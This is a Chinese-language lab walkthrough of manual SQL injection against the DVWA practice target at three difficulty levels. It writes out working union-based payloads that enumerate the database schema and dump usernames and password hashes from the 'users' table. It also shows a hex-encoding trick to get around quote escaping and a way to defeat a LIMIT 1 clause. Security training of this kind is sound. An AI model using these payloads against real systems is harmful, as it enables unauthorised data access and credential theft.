手工注入的常规思路
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定回显位置
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.得到数据
我这里以DVWA靶场为例
Low
1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。
2.判断sql是否存在存入,以及注入的类型
1' and '1'='1
3.猜解SQL查询语句中的字段数
1' order by 2#
1' order by 3#
从上面查询后得到的两个图可以说明,SQL语句查询的表的字段数是2
4.确定显示的位置(SQL语句查询之后的回显位置)
1' union select 1,2#
下图可以看出有2个回显
5.查询当前的数据库,以及版本
1' union select version(),database()#
6.获取数据库中的表
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
7.获取表中的字段名
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
8.获得字段中的数据
1' union select user,password from users#
Medium
1.点击查看源码,可以看到中级加入了一些防御,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入
2.利用bp抓包,修改数据包,绕过防御
判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入
3.猜解sql查询语句中的字段的个数,确定回显的位置
4.获取当前数据库的名称以及版本
获取当前数据库的名称以及版本 1 union select database(),version()#
5.获取数据库中的所有表
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
6.获取表中的所有字段名
考虑到单引号被转义,可以利用 16 进制进行绕过
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
7.获取字段中的数据
1 union select user,password from users#
1 union select user,password from users#
High
点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果
虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。
1' or 1=1 union select group_concat(user),group_concat(password) from users #